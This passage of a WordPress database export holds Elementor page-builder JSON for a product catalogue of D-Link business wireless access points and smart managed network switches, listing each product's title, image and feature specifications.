port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7642,3420,'_elementor_version','2.5.14'),(7643,3420,'_elementor_edit_mode','builder'),(7646,3421,'_wp_page_template','template-fullwidth.php'),(7647,3421,'_elementor_template_type','post'),(7648,3421,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" 